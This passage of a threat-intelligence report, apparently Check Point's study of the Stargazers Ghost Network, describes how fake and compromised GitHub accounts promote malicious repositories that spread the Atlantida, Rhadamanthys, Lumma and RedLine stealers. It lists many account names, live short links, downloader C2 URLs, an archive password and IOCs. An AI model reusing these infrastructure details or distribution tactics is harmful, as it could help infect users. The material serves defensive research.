Aniketgamingx, ArsanyAbdalla, Aubskobbes5, Azang123, Badno2055,\r\nBahaabasuny0, Bazarasxx, BilalPasta, Boki309, BreakDee, BrokyBroke, Byronjr1, CanyonsEcho, Castle135798, Ch4r0oN,\r\nChhunly844, Client, CoderXL, Coding, Cortjiani, D4RK4T, DSB1973, Danish24123, DavidGruz, Detroit16, Drakanobr,\r\nEmaynike, EneerOP, Ericshalbe, Felixcyniiy, ForlornWindow46, Fox, Fox-King777, 
FranciscoFerreiraMaciel,\r\nGEOMETRYDASHGOD2010, GEOXKEVINO, GabrielFel, GabrielHorbach, GabrielHorbach,, Gabst7, Gaplaster3600,\r\nGhadir450, Git, Gokumase, Gonachapa, GurujiIsLive, Hassanjanjua, Haxrusxx, Housamelsherif, HuzaifaOmar, I1900sn,\r\nImadOmer, Irsyan12, ItzzSzymusss, Ivrou66, Jamaldoskiy, Jaouadrobio, Jasonnoi, Jayko235, Jayxxx14, Jessy55491,\r\nJhonataLim, Jockymaxi, JonathanLaraAguirre, Jtayyab007, KaizerEmre, KenderMendoza2, Kets357, Kimi-, Kimi-Hsueh,\r\nKle182, Kroz157, Krutik03, Kynarox, LAKAKKK, LEVITA44, Leandro1242, LeandroMirante, Lebagordo, LeoBello00,\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 19 of 45\n\nLyonnais, Lyonnais-2008, M-Asghar8atk, MHCYT, Madulahstaxks, MahmoudRede, Malek50, Mallco14,, Marco22gt,\r\nMarcoscpires, Masud99Rana, MemeiNako, MenowJP, Miguelnogame, MohamedFayek2024, Mudjator,\r\nMuhammadBayuPriyatna, MuhammadRamzan123, Mustangth666, Nannydream, Nealhag, Neivolan, NexoCreeper,\r\nNikolas145, Nitanzw, NobiKazi, Oeslen, OrucMuhammed, OscarSalas19, Oscardoh63, Pantyshop, PasaBrava, Paul, Paul-CACHERA, Pedro42600, PlarixTools, PsandQs, ROBOT2207, Rajveer8169, RefiElisa, Richard-Petty-Cru, RikuAAAAA,\r\nRiles923, RimuruNeto, RolandSandorNagy, RoyalLegend0304, Ruhan44, SaidDEV89, SaidSetup, SalmonButterzz,\r\nSatakeReal, Sebocha18, Severete, Sinbaiezechiel, SirRafael, Sourovnag, Sourovnag,, StrikerJapa, SusannBaldiviezo,\r\nSyedhamzaalishah, SzaSza2, TUNA-V, Technogun92, Thanakys, ThawHtooZin, ThiagoSilva97, Tomasdionisio,\r\nTulioInnoveSistema, Tumladen, Umair-Younus-1152, Urashtu, UsmanKhursheed06, Vavarea, Vickysris, Victor,\r\nVilaxDev00, Voracxty, WILWAP, Wanmeng811, Warungkakek, WeFacaa, Winzume, YakultGo, Yinyang26, Yokeshraj2001,\r\nYoussef, Zecuss, Zekoahmed, Zounzxx, a1nz0, aabdelhaleemm, absolutelie, achieversm, adixillua, advaman,\r\nalexplaysminecraft, aliii00, aminov1010, anaskhan785, anasskeda, aninha1kstro, asayahandatgr, asdasfazamazsdgfdsg,\r\nasdssfsd, asliyiilmaz, 
asmuiahmad, asmuiahmad,, atoras34, axeldolce0x, bgpx28, bleblquck, bodrumblock, brayan7897,\r\nbrookandels, c0mroy, chatchai2165, dadinhokkk, dblancolascarez, deepak, deepak-gurjar07, deseplikon, dikiprsty, dnomesh,\r\necoplayer07, egoistpanel, elMarkoDev, epsilon201, f4h3m, fanerso, fatemehsotudeh, foxboyyyyyyy, gdois, georgi1122,\r\nguy1a2, hamudi1122, hereisue, hnghvfhcggf6699, hugotpdev, imazen59, imbored112, ismailsawadi, issabii,\r\njahanzaibranaa1, jeremix14, jetunpatel1376, katarinadewi01, kb2030, khaledbenz2009, khanbhijan, khk6644, kitrock25,\r\nknowledgecase, kubisshi, kumar7679, kumarthar, kurosh, kxzpreto, kxzpreto,, larryewakins, lawadas1231, lenegropu,\r\nlilmaku, llkkaaaslk, lokmanbaz, lucasmatheusdasilvadarosa, lucasodiniz, lucasstarley, lukeomatik, lyyzwjj, lzero121,\r\nm1a5g24, mady0602, mahlatsita, mailnhucac, malhotraraghav2003, malrazer, mansourazim, marcosibottino, mariamlola,\r\nmateuscarestiato, mayilvaganam, medo659, memo20101, mertahxo, mgred22, milklove60122, misterclima, mjsal,\r\nmohamednaeem109, monishgoal, motiaaa2, mougouta1, mrsinner56, mtalha7262, nachoooopxd, nadir0125, nathan,\r\nnendousbae, newbieRizal, nguyenthanhthuy140403, nikko6433, ninexslow, ninjas007, nizzamgrty, nomeshhost,\r\nnoobking1234, noobking1234,, notayessir, notglwze, nunur66, oPaozinh0, oicu8lsd, openmare, pao2522, passcard2A,\r\npatadoeman222, phuriphatthongkuea, pierre930523, potatoaim1313, prasanta1515, qaisar1234890, quavofinnest, rakuyoMo,\r\nramdoni, ratihpurnamasar, raul2341, razzm7, rbxrecoveryexploits, rcrobcarlos, rdiaz-002, reekid84, revelicate,\r\nreynaldirey18, richiewrld, rico260104, ricogann, riendlek, riftal12, riocdr, rtR4RWp, rudy172, rxcw777, saadanjaved,\r\nsaintxzx, saivaibhavtamiri, samiranf, sarathi, sejgseok, sepqy, sha0urya, sisjosex, sowjanyabhat, squidy24, sujay1599,\r\ntajokshare2023, tamsirdiarra4, teejw, thedani1122, therotmaxxer, titiobig, tjwpo, tonyOsama1546, trev2coldfrr,\r\ntvixterSourceCode, txxzclew, ugyen27, ultralinksgh, 
vault797478, victid, wa314444, watcharaponnar, webdevuacs,\r\nwildan324, williamvidal87, xinghe99, xitadinhoss, yiosoimortal, yokamm, yoosef30, yourscloudyy, yuong22, z8lc,\r\nz8lc60go, zaayaz, zefgzeragze, zuhdi, zuhdi-in\r\n0SPEED, 1shadowed, 2011mehdi, 60go, 7qwertyz, 9599853506, AUGUSCO, Ahmad7Salah, Akshitdangwal, Alexaldi, Alpha\r\nBoki309, BreakDee, BrokyBroke, Byronjr1, CanyonsEcho, Castle135798, Ch4r0oN, Chhunly844, Client, CoderXL, Codi\r\nEricshalbe, Felixcyniiy, ForlornWindow46, Fox, Fox-King777, FranciscoFerreiraMaciel, GEOMETRYDASHGOD2010, GEOX\r\nHousamelsherif, HuzaifaOmar, I1900sn, ImadOmer, Irsyan12, ItzzSzymusss, Ivrou66, Jamaldoskiy, Jaouadrobio, Jas\r\nKimi-, Kimi-Hsueh, Kle182, Kroz157, Krutik03, Kynarox, LAKAKKK, LEVITA44, Leandro1242, LeandroMirante, Lebagor\r\nMarco22gt, Marcoscpires, Masud99Rana, MemeiNako, MenowJP, Miguelnogame, MohamedFayek2024, Mudjator, MuhammadBa\r\nOscarSalas19, Oscardoh63, Pantyshop, PasaBrava, Paul, Paul-CACHERA, Pedro42600, PlarixTools, PsandQs, ROBOT220\r\nSaidSetup, SalmonButterzz, SatakeReal, Sebocha18, Severete, Sinbaiezechiel, SirRafael, Sourovnag, Sourovnag,,\r\nTumladen, Umair-Younus-1152, Urashtu, UsmanKhursheed06, Vavarea, Vickysris, Victor, VilaxDev00, Voracxty, WILW\r\nZounzxx, a1nz0, aabdelhaleemm, absolutelie, achieversm, adixillua, advaman, alexplaysminecraft, aliii00, amino\r\naxeldolce0x, bgpx28, bleblquck, bodrumblock, brayan7897, brookandels, c0mroy, chatchai2165, dadinhokkk, dblanc\r\nfanerso, fatemehsotudeh, foxboyyyyyyy, gdois, georgi1122, guy1a2, hamudi1122, hereisue, hnghvfhcggf6699, hugot\r\nkhanbhijan, khk6644, kitrock25, knowledgecase, kubisshi, kumar7679, kumarthar, kurosh, kxzpreto, kxzpreto,, la\r\nlyyzwjj, lzero121, m1a5g24, mady0602, mahlatsita, mailnhucac, malhotraraghav2003, malrazer, mansourazim, marco\r\nmohamednaeem109, monishgoal, motiaaa2, mougouta1, mrsinner56, mtalha7262, nachoooopxd, nadir0125, nathan, nend\r\nnotglwze, nunur66, oPaozinh0, oicu8lsd, openmare, pao2522, 
A little less than 2,000 events took place in these repositories. An impressive 621 occurred on May 27, 2024, and 555 on May 31, 2024, suggesting either that a campaign took place around those dates or that GitHub disrupted parts of the operation and Stargazer Goblin then “fixed” the affected parts of the network.

Figure 22 – Stargazers Ghost Accounts activities on repositories related to the Atlantida campaign.

One account owned the repositories, and another made the README.md commits, which, in some cases, also contained their proton.me email address. The authors of the README.md files were:

Commit Date | Commit Author | Commit Email | Repository
2024-05-25T10:44:45Z GMT-5 | slaycorpsa | 166757567+slaycorpsa@users.noreply.github.com | glassmuysa/TwT-Genr
2024-05-25T11:03:18Z GMT-5 | slaycorpsa | 166757567+slaycorpsa@users.noreply.github.com | glassmuysa/Mail-Ac-Gen
2024-05-25T11:55:04Z GMT-5 | slaycorpsa | 166757567+slaycorpsa@users.noreply.github.com | glassmuysa/Ytb-Dwnld
2024-05-25T12:00:10Z GMT-5 | slaycorpsa | 166757567+slaycorpsa@users.noreply.github.com | glassmuysa/Htlx-Gen-Check
2024-04-11T23:22:47Z GMT+2 | twarisua | 166768002+twarisua@users.noreply.github.com | valiso0/Mail-Ac-Generator
2024-04-11T23:24:39Z GMT+2 | twarisua | 166768002+twarisua@users.noreply.github.com | valiso0/Mail-Ac-Generator
2024-05-25T12:11:09Z GMT+2 | twarisua | 166768002+twarisua@users.noreply.github.com | valiso0/Mail-Ac-Generator
2024-05-25T12:12:25Z GMT+2 | twarisua | 166768002+twarisua@users.noreply.github.com | valiso0/TwT-Gen
2024-05-25T12:15:12Z GMT+2 | twarisua | 166768002+twarisua@users.noreply.github.com | valiso0/Ytb-Dwnld
2024-05-26T10:54:48Z GMT-5 | blagoslo | seppdrmosi21@proton.me | dscvm/Discord-Vbot
2024-05-26T11:07:42Z GMT-5 | blagoslo | seppdrmosi21@proton.me | dscvm/Visoul-Grabber
2024-05-27T13:34:17Z GMT-5 | ellis441 | killimagaro001@proton.me | gooles54/Rison-Raid-Bot
2024-05-27T14:10:03Z GMT-5 | ellis441 | killimagaro001@proton.me | gooles54/Rison-Trading-Bot
2024-05-27T14:31:44Z GMT-5 | ellis441 | killimagaro001@proton.me | gooles54/WPscn
2024-05-30T20:24:15Z GMT-4 | gwala12 | zerocoinmarksirt21@proton.me | lzero121/iNS-vWS
2024-05-30T20:24:29Z GMT-4 | gwala12 | zerocoinmarksirt21@proton.me | lzero121/tK-vWS
2024-05-30T20:24:46Z GMT-4 | gwala12 | zerocoinmarksirt21@proton.me | lzero121/TWT-vWS
2024-05-30T20:24:56Z GMT-4 | gwala12 | zerocoinmarksirt21@proton.me | lzero121/Ytb-Vws
2024-05-31T20:58:21Z GMT-4 | qucher52 | svarovsky00012@proton.me | bleblquck/FT-Vieww
2024-05-31T20:58:46Z GMT-4 | qucher52 | svarovsky00012@proton.me | bleblquck/Kck-Vw
2024-05-31T20:58:59Z GMT-4 | qucher52 | svarovsky00012@proton.me | bleblquck/Trv-Vws
2024-05-31T20:59:09Z GMT-4 | qucher52 | svarovsky00012@proton.me | bleblquck/Tw-Vws

Interestingly, in the case of the repository valiso0/Mail-Ac-Generator, there are three commits instead of one. This suggests that if the repository is not discovered and banned, it can be used in multiple campaigns. Typically, the behavior is that the author creates a repository, commits the malicious README.md, and shortly after, the Stargazer accounts proceed to star the repository.

Campaign II, Stargazers Ghost Network – Rhadamanthys

In many cases, the “phishing” templates clearly targeted regular users, regardless of the particular intended audience. There was one specific case in which we didn’t know if they targeted security researchers or other threat actors. The template’s title, “RisePro Stealer + HVNC Crack: The Ultimate Cybersecurity Threat,” provided, in theory, a cracked version of the known infostealer RisePro.
In reality, it infected the victims with a GO downloader that later dropped Rhadamanthys.

Figure 23 – RisePro Phishing Template.

Other repositories distributed the same short link, goo.su/n8J4mOH, with different phishing templates targeting different audiences.
We observed direct external links to malicious scripts or links redirecting to another GitHub repository release, but threat actors also utilized short links like goo.su and bit.ly. Searching the previously mentioned short-link domains, we obtained around 400 repositories.

Figure 24 – Results with “Download” and short-links.

The short Download link redirects the victims to download an archive file from maestrascreciendoenamor.com/Loader-Installers.zip. Another short link, goo.su/rH3n, also redirects to this URL, making a total of 142 repositories that distribute the GO downloader below.

802CBDBB7C195DAD3F763C38F21900A9006DB3292FFFC723B3CF75C10D239EA9 Loader-Installers\CFG.ini
B624949DF8B0E3A6153FDFB730A7C6F4990B6592EE0D922E1788433D276610F3 Loader-Installers\DriverUP.dll
060DE3B4CF3056F24DE882B4408020CEE0510CB1FF0E5007C621BC98E5B4BDF3 Loader-Installers\Loader Installer.exe

The downloader makes a GET request that appears to register the bot’s IP address and generate campaign statistics: 147.45.44.73:1445/bibika1337?reason=. When we visited the link, we saw a Russian-language page listing the number of launched downloaders (the last statistics before the clean-up action).

Russian | English | No.
Запущено всего | Total launched | 1123
Запущено за две недели | Launched in two weeks | 1061
Запущено за неделю | Launched in a week | 621
Запущено за 2дня | Launched in 2 days | 131
Запущено за день | Launched in a day | 44

In just two weeks, Rhadamanthys infected more than 1,050 victims while being distributed via the Stargazers Ghost Network.

Figure 25 – Campaign statistics.

Following two more GET requests, the victim downloads two password-protected archives:
1. 147.45.44.73:1488/moa/Tricky2.rar
2. 89.23.98.116:1444/Tricky.rar

Figure 26 – Multiple password-protected archives are stored inside those directories.

Figure 27 – Two archives are stored, the last one from 2024-06-09.

Both archives are decrypted using the same password, yanabibika.

Figure 28 – Password-protected archive unpacking.

938554DB472202C51069B3590820456EB37EC3680B555D1DE532623E01468D47 Tricky2\withya_MrAnon.cmd
64A49FF6862B2C924280D5E906BC36168112C85D9ACC2EB778B72EA1D4C17895 Tricky\prezi-desktop-6-26-0.exe

The executable inside the archive is the GO loader for Rhadamanthys, which is injected into C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe and later communicates with its C&C, 147.78.103.199:2529.

The GitHub repositories for the Atlantida campaign and the Rhadamanthys campaign were created around the same time. The earliest Rhadamanthys repository was created on 2024-05-30T18:51:26Z. The network operator employed around 120 GitHub accounts for this campaign.

Figure 29 – Accounts per Action.

Another interesting discovery occurred when we further examined the commits and forked accounts. On 2021-02-11T02:41:40Z (not a typo, it is indeed 2021), the repository V-arc/Silverfish (53041402+V-arc@users.noreply.github.com / 71246462@qq.com) was created and, between February and August 2021, was forked by 25 other accounts. On 2024-06-02T09:06:59Z, V-arc updated the original README.md file, which now contains the phishing link distributing Rhadamanthys. Two of the 25 forked repositories applied the commit from the original repository. The reason for choosing to “infect” that specific repository is that it is the most popular one owned by this account.

Figure 30 – Updating last commit from 2021-02-13T15:41:31Z.

The V-arc GitHub account was created on 2019-07-18T09:42:29Z but was updated on 2024-05-31T11:14:43Z. We aren’t sure exactly what kind of update occurred, but possibly a new GPG key was generated. As expected, the account also has a repository with the pattern # V-arc1\n1 created on 2024-06-08T19:03:31Z. The initial commit on the malicious repository was possibly made using the web interface on 2021-02-11T02:41:40Z in the timezone UTC+8.
The rest of the\r\ncommits around the same time (in day(s)) possibly happened from a local environment on 2021-02-11T02:44:59Z , 2021-\r\n02-11T06:25:26Z , and the last legitimate commit on 2021-02-13T15:41:31Z . While all the “initial” commits happened in\r\nthe timezone UTC+8 , the last malicious commit in 2024 occurred on UTC+3 . We consider it highly unlikely that the\r\nrepository started as malicious and only started pushing malware 3 years later. Possibly, the account was compromised and\r\nthen was included in the Stargazers Ghost Network. With that bit of information, we consider the ~1100\r\naccounts/repositories with the pattern # {username}1\\n1 a test of compromised accounts credentials/rights.\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 36 of 45\n\nAccording to the campaign statistics, 687 of the activities on malicious repositories distributing the GO downloader\r\noccurred on May 31, 2024, indicating the campaign’s start date.\r\nFigure 31 – Rhadamanthys campaign, GitHub accounts activities.\r\nThe authors of the README.md files that were forked by the rest of the accounts:\r\nCommit Date\r\nCommit\r\nAuthor\r\nCommit Email\r\nRepository\r\nOwner\r\nNo\r\nMaliciou\r\nReposito\r\n2024-05-\r\n29T20:55:01Z\r\nGMT+0\r\nbatuhanodbs 104384818+batuhanodbs@users.noreply.github.com batuhanodbs 1\r\n2024-05-\r\n29T21:00:55Z\r\nGMT+0\r\nHeangHorn 75545632+HeangHorn@users.noreply.github.com HeangHorn 1\r\n2024-05-\r\n29T21:09:37Z\r\nGMT+0\r\ndblancolascarez 107002366+dblancolascarez@users.noreply.github.com dblancolascarez 1\r\n2024-05-\r\n29T21:15:46Z\r\nGMT+0\r\nyessine-agrebi 59874615+yessine-agrebi@users.noreply.github.com yessine-agrebi 1\r\n2024-05-\r\n30T11:59:15Z\r\nGMT+0\r\nSpacyXyt 80075528+SpacyXyt@users.noreply.github.com SpacyXyt 2\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 37 of 45\n\nCommit Date\r\nCommit\r\nAuthor\r\nCommit 
Email\r\nRepository\r\nOwner\r\nNo\r\nMaliciou\r\nReposito\r\n2024-05-\r\n30T18:51:26Z\r\nGMT+0\r\nEssence-Of-Slimez-37120878149+Essence-Of-Slimez-37@users.noreply.github.comEssence-Of-Slimez-37\r\n27\r\n2024-05-\r\n30T19:40:27Z\r\nGMT+0\r\nMajor2000 majormadobe@gmail.com Major2000 2\r\n2024-05-\r\n31T13:48:49Z\r\nGMT+0\r\nMolano11 124221765+Molano11@users.noreply.github.com Molano11 2\r\n2024-05-\r\n31T15:21:05Z\r\nGMT+0\r\nDanms661 dnsrm9787@gmail.com Danms661 3\r\n2024-05-\r\n31T21:50:08Z\r\nGMT+0\r\nblackvn05 62129353+blackvn05@users.noreply.github.com blackvn05 1\r\n2024-06-\r\n01T12:55:33Z\r\nGMT+0\r\nySunSh1ne 113144625+ySunSh1ne@users.noreply.github.com ySunSh1ne 1\r\n2024-06-\r\n01T12:56:02Z\r\nGMT+0\r\nAmerHashima 43539190+AmerHashima@users.noreply.github.com AmerHashima 1\r\n2024-06-\r\n01T12:56:45Z\r\nGMT+0\r\njgprimaki 93926139+jgprimaki@users.noreply.github.com jgprimaki 1\r\n2024-06-\r\n02T09:06:59Z\r\nGMT+3\r\nV-arc 53041402+V-arc@users.noreply.github.com V-arc 1\r\nStargazer Goblin and Malware Distributed via Network\r\nComparing the two campaigns, the difference in links and modus operandi, despite both being “starred” and “forked” by the\r\nsame accounts, leads us to believe that the Stargazers Ghost Network functions as a Malware/Link Distribution as a\r\nService (DaaS). In this model, threat actors share their malicious links or malware, possibly at different prices, and\r\ndistribute them through these malicious GitHub repositories and “legitimized” by the Stargazer accounts. Check Point\r\nResearch is tracking the threat actor/group behind this service as Stargazer Goblin. 
This group provides, operates, and\r\nmaintains the Stargazers Ghost Network, which distributes malicious links or malware via their Ghost GitHub accounts.\r\nMalware families distributed via the network include:\r\nAtlantida Stealer\r\nRhadamanthys\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 38 of 45\n\nLumma Stealer\r\nRedLine\r\nRisePro\r\nSince the beginning of June 2024, we observed 211 unique still active repositories pushing malicious links, compared to 135\r\nactive from May. Since May 2024, GitHub has taken down approximately 1559 repositories and their related GitHub\r\naccounts.\r\nFigure 32 – Active repositories per last update date. \r\nFrom the accounts we have been tracking, 8 different accounts have bestowed 530 stars to repositories. While we do not\r\nhave access to all the starred repositories as old ones were taken down, all of them were updated around the same date\r\n2024-05-31T19:00:32Z :\r\n@Pids134, @rego321, @Molano11, @nepalhack, @PeeKhaye, @Ozgur010101, @posyshp, @ProfessorAMi\r\n@Pids134, @rego321, @Molano11, @nepalhack, @PeeKhaye, @Ozgur010101, @posyshp, @ProfessorAMi\r\n@Pids134, @rego321, @Molano11, @nepalhack, @PeeKhaye, @Ozgur010101, @posyshp, @ProfessorAMi\r\nWhile none of the accounts we mention could provide us with information on when the network was created, there is an\r\naccount whose name indicates its purpose as part of the network. @StarGhostSG , with 253 starred repositories, was created\r\non 2022-08-31T00:05:25Z . This is the creation date, but the network could have been either under development or already\r\noperating on a smaller scale during that time.\r\nDark-Web Forums\r\nWhile searching Dark Web forums, we found an advertisement from July 8, 2023, promoting the described network. The\r\nadvertisement banner is written in both English and Russian. 
According to the post, this account offers services for starring,\r\nfollowing, forking, and watching GitHub accounts and repositories, as well as fulfilling any other requested actions on\r\nGitHub.\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 39 of 45\n\nFigure 33 – The first advertisement was on 2023-07-08.\r\nThe prices vary depending on the services provided. For example, starring a repository with 100 accounts costs $10, with a\r\nrate of 10 stars per USD. Providing a trusted account with an “aged” repository costs $2. Discounts are available for\r\npurchases over $500.\r\nFigure 34 – Service details and prices.\r\nBased on this information and the number of repositories and actions that occurred from mid-May to mid-June 2024,\r\nCheck Point Research calculated Stargazer Goblin‘s potential profit to be approximately $8,000. We believe that more\r\nactions and repositories took place during this time, making the calculated profit just a fraction of the actual profit.\r\nConsidering that Stargazers Ghost Network has operated publicly since July 2023 and likely on a smaller scale since\r\nAugust 2022, we estimate the total profit to be approximately $100,000 for the entire lifespan of Stargazers Ghost\r\nNetwork. GitHub could probably produce a more accurate estimation of the profit, as they have more insights into the\r\nactions that occurred on banned accounts and repositories.\r\nPast, Present, and Future Ghosts Networks\r\nCheck Point Research, based on intelligence, considered it highly probable that GitHub Ghost accounts are only one part\r\nof the grand picture, with other Ghost accounts operating on different platforms as an integral part of an even larger\r\nDistribution as a Service universe. This theory gained support when we discovered a GitHub repository sharing a link to an\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 40 of 45\n\nunlisted YouTube video. 
The video instructs potential victims how to download and install a supposedly “free” version of\r\nAdobe Photoshop.\r\nFigure 35 – GitHub account with download and YouTube links. \r\nIn the YouTube video, the threat actor is seen downloading a password-protected archive from clouds-folder[.]com ,\r\nextracting it using the password 2424 , and then proceeding to execute the installer (Lumma Stealer). During our careful\r\nexamination of the video, we identified the full path to the dist folder,\r\nC:\\\\Users\\\\Peresvet\\\\DevelNextProjects\\\\test\\\\build\\\\dist .\r\nFigure 36 – Ghost YouTube Account and malicious unlisted Video.\r\nThe YouTube Ghost account also comments on its own video. Additionally, we observed the actual owner of the\r\ncompromised GitHub account, @ANGEOM21 , replying to one of the Ghost’s comments. This interaction validates our\r\nprevious assumption that many of the accounts in the Stargazers Ghost Network are compromised.\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 41 of 45\n\nFigure 37 – YouTube Ghost account’s video comment section.\r\nWe believe that Stargazer Goblin created a universe of Ghost accounts operating across various platforms such as\r\nGitHub, Twitter, YouTube, Discord, Instagram, Facebook, and many others. This further leads us to believe that the\r\nAtlantida Stealer campaigns, which specifically targeted social media-oriented users, could have been performed by\r\nStargazer Goblin to obtain accounts for the Ghost networks. Similar to GitHub, other platforms can be utilized to\r\nlegitimize malicious phishing and distribute links and malware to victims through posts, repositories, videos, tweets, and\r\nchannels, depending on the features each platform offers.\r\nFuture Ghost accounts could potentially utilize Artificial Intelligence (AI) models to generate more targeted and diverse\r\ncontent, from text to images and videos. 
By considering targeted users’ replies, these AI-driven accounts could promote\r\nphishing material not only through standardized templates but also through customized responses tailored to real users’\r\nneeds and interactions. A new era of malware distribution is here, where we expect these types of operations to occur more\r\nfrequently, making it increasingly difficult to distinguish legitimate content from malicious material.\r\nConclusion\r\nStargazer Goblin created an extremely sophisticated malware distribution operation that avoids detection as GitHub is\r\nconsidered a legitimate website, bypasses suspicions of malicious activities, and minimizes and recovers any damage when\r\nGitHub disrupts their network. Utilizing multiple accounts and profiles performing different activities from starring to\r\nhosting the repository, committing the phishing template, and hosting malicious releases, enables the Stargazers Ghost\r\nNetwork to minimize their losses when GitHub performs any actions to disturb their operations as usually only one part of\r\nthe whole operation is disrupted instead of all the involved accounts.\r\nThe campaigns performed by the Stargazers Ghost Network and malware distributed via this service are extremely\r\nsuccessful. In a short period of time, thousands of victims installed software from what appears to be a legitimate repository\r\nwithout suspecting any malicious intent. The heavily victim-oriented phishing templates allow threat actors to infect victims\r\nwith specific profiles and online accounts, making the infections even more valuable.\r\nThe actual number of accounts performing various network operations is unclear, as the network is constantly evolving. Our\r\nlatest calculations suggest there are more than 3,000 Ghost accounts. Considering a campaign of approximately 30\r\nrepositories utilizing around 380 Ghost accounts, the total number may be even higher. 
While GitHub does ban suspect\r\naccounts in many cases, the operations run uninterrupted for a long time before those measures are taken.\r\nSome of the Ghost accounts appear to have been created by the operators, while others seem to be compromised “normal”\r\nGitHub accounts. This makes GitHub credentials valuable in underground marketplaces, as the network also incorporates\r\nsuch accounts. The addition of compromised accounts into the network makes it challenging to estimate when Stargazer\r\nGoblin started their malicious activities. As it is difficult to easily separate clear malicious activities from normal users ones.\r\nHowever, based on some core accounts, we consider August 2022 to be when the network development began and/or was\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 42 of 45\n\nworking on a smaller scale. The first public advertisement of Stargazers Ghost Network occurred the following year, on\r\nJuly 8, 2023. The total estimated profit for Stargazer Goblin is estimated at $100,000.\r\nWe are entering a new era of malware distribution, where ghost accounts organically promote and distribute malicious links\r\nacross various platforms. Future ghost accounts powered by artificial intelligence could launch even more targeted\r\ncampaigns, making it increasingly difficult to distinguish between legitimate content and malicious material.\r\nRecommendations\r\nGitHub has been long used for malicious activities, though the introduction of this network in the attack makes it fairly\r\ndifficult for normal users to detect suspicious repositories. To mitigate the risks of being affected by such threats, it is\r\nessential to:\r\n1. Keep operating systems and applications updated through timely patches and other means.\r\n2. Be cautious of unexpected emails/messages with links, especially from unknown senders.\r\n3. Enhance cybersecurity awareness among employees.\r\n4. 
Consult security specialists for any doubts or uncertainties.\r\nProtection\r\nCheck Point Threat Emulation and Harmony Endpoint provide comprehensive coverage of attack tactics, file types, and\r\noperating systems and protect its customers against this type of attack and malware families described in this report.\r\nInfoStealer.Win.Atlantida.*\r\nTrojan.WIN32.AtlantidaStealer.A\r\nTrojan.WIN32.AtlantidaStealer.B\r\nInfoStealer.Wins.Lumma.ta.S\r\nInfoStealer.Wins.Lumma.ta.T\r\nInfoStealer.Wins.Lumma.ta.U\r\nInfoStealer.Win.Lumma.N\r\nInfoStealer.Win.Lumma.O\r\nInjector.Win.RunPE.C\r\nLoader.Wins.GoBitLoader.A\r\nTrojan.Wins.Imphash.taim.LV\r\nTrojan.Win32.RedLine Stealer.TC.6a9fRQRh\r\nInfoStealer.Wins.Redline.ta.BY\r\nIOCs\r\nDescription Value\r\nAtlantida –\r\nHTA\r\n2B6C8AA2AC917D978DFEC53CEF70EACA36764A93D01D93786CC0D84DA47CE8E6\r\nAtlantida –\r\nMHTML\r\n385EBE3D5BD22B6A5AE6314F33A7FA6AA24814005284C79EDAA5BDCF98E28492\r\nAtlantida –\r\nPowershell\r\n2EBF051F6A61FA825C684F1D640BFB3BD79ADD0AFCFF698660F83F22E6544CBA\r\nAtlantida –\r\n.NET Injector\r\nAB59A8412E4F8BF3A7E20CD656EDACF72E484246DFB6B7766D467C2A1E4CDAB0\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 43 of 45\n\nDescription Value\r\nAtlantida –\r\nC\u0026C\r\n185.172.128[.]95\r\nRhadamanthys\r\n– GO\r\ndownloader\r\n060DE3B4CF3056F24DE882B4408020CEE0510CB1FF0E5007C621BC98E5B4BDF3\r\nRhadamanthys\r\n– GO\r\ndownloader –\r\nC\u0026Cs\r\n147.45.44[.]73[:]1488\r\n89.23.98[.]116[:]1444\r\nRhadamanthys\r\n– GO Loader\r\n64A49FF6862B2C924280D5E906BC36168112C85D9ACC2EB778B72EA1D4C17895\r\nRhadamanthys\r\n– C\u0026C\r\n147.78.103[.]199[:]2529\r\nLumma\r\nStealer\r\n148C456E83E746A63E54EC5ABDA801731C42F3778E8EB0BF5A5C731B9A48C45D\r\n2F5624DCDA1D58A45491028ACC63FF3F1F89F564015813C52EEBD80F51220383\r\n98B7488B1A18CB0C5E360C06F0C94D19A5230B7B15D0616856354FB64929B388\r\nA484FA09BE45608E23D8E67CD28675FA3E3C4111AF396501385256CE34FF1D95\r\nLumma 
–\r\nC\u0026Cs\r\nhxxps://considerrycurrentyws[.]shop\r\nhxxps://deprivedrinkyfaiir[.]shop\r\nhxxps://detailbaconroollyws[.]shop\r\nhxxps://distincttangyflippan[.]shop\r\nhxxps://greentastellesqwm[.]shop\r\nhxxps://horsedwollfedrwos[.]shop\r\nhxxps://innerverdanytiresw[.]shop\r\nhxxps://lamentablegapingkwaq[.]shop\r\nhxxps://macabrecondfucews[.]shop\r\nhxxps://messtimetabledkolvk[.]shop\r\nhxxps://patternapplauderw[.]shop\r\nhxxps://relaxtionflouwerwi[.]shop\r\nhxxps://sideindexfollowragelrew[.]pw\r\nhxxps://slamcopynammeks[.]shop\r\nhxxps://standingcomperewhitwo[.]shop\r\nhxxps://stickyyummyskiwffe[.]shop\r\nhxxps://sturdyregularrmsnhw[.]shop hxxps://understanndtytonyguw[.]shop\r\nhxxps://vivaciousdqugilew[.]shop\r\nRedLine\r\nStealer\r\n8D8D7EB1180C13ED629DCEAC6C399C656692A6476C49047E0822BEC6156A253A\r\nRedLine –\r\nC\u0026C\r\n147.45.47[.]64[:]11837\r\nBLOGS AND PUBLICATIONS\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 44 of 45\n\nCheck Point Research Publications\r\nGlobal Cyber Attack Reports\r\nThreat Research\r\nFebruary 17, 2020\r\n“The Turkish Rat” Evolved Adwind in a Massive Ongoing Phishing Campaign\r\nWe value your privacy!\r\nBFSI uses cookies on this site. We use cookies to enable faster and easier experience for you. By continuing to visit this\r\nwebsite you agree to our use of cookies.\r\nSource: https://research.checkpoint.com/2024/stargazers-ghost-network/\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 45 of 45",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://research.checkpoint.com/2024/stargazers-ghost-network/"
	],
	"report_names": [
		"stargazers-ghost-network"
	],
